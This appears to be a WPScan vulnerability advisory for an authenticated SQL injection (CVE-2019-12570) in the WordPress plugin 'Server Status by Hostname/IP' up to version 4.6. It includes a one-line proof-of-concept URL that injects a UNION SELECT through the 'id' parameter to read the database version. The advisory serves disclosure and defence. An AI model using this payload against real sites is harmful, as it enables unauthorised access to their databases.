Server Status by Hostname/IP <= 4.6 - Authenticated SQL Injection



Description
The last time it was checked the plugin was still affected and had been closed.
Proof of Concept
http://www.example.com/wp-admin/admin.php?page=all-servers&id=2+UNION+SELECT+1%2C2%2C3%2C%40%40version+&action=edit

Affects Plugin

no known fix
- plugin closed

References

CVE 2019-12570
URL https://github.com/ivoschyk-cs/exploit_wp/blob/master/CVE-2019-12570

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Original Researcher Ihor Voschyk
Submitter Ryan Dewhurst
Submitter Website https://wpscan.io
Submitter Twitter ethicalhack3r
Views 1594
Verified No
WPVDB ID 9964

Timeline

Publicly Published 2019-07-01 (about 1 year ago)
Added 2019-12-02 (7 months ago)
Last Updated 2020-02-13 (5 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin